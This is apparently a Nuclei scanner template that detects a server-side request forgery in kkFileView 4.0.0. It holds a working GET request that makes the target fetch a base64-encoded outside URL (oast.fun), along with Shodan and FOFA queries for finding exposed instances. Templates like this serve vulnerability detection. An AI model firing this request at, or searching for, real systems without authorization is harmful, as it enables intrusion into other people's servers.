id: kkfileview-ssrf info: name: kkFileView 4.0.0 - Server-Side Request Forgery author: Arm!tage severity: high description: | kkFileView 4.0.0 is susceptible to server-side request forgery reference: - https://github.com/kekingcn/kkFileView/issues/296 classification: cwe-id: CWE-918 cpe: cpe:2.3:a:keking:kkfileview:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview shodan-query: http.html:"kkFileView" fofa-query: app="kkFileView" tags: ssrf,kkfileview,keking http: - method: GET path: - "{{BaseURL}}/onlinePreview?url={{base64('http://oast.fun/robots.txt')}}" extractors: - type: regex name: data group: 1 regex: - 'hidden id="textData" value="([A-Za-z0-9=]+)"\/>' internal: true matchers: - type: dsl dsl: - contains(base64_decode(data), "Disallow") # digest: 4a0a0047304502205c5fea3a4826cbcb76ac8669c21420dcad36813e30522c07c636b22ff748b9fa022100cc0be63d679ac94f6709de517de3262f89800099b72c1ff20ff9960b1144905e:922c64590222798bb761d5b6d8e72950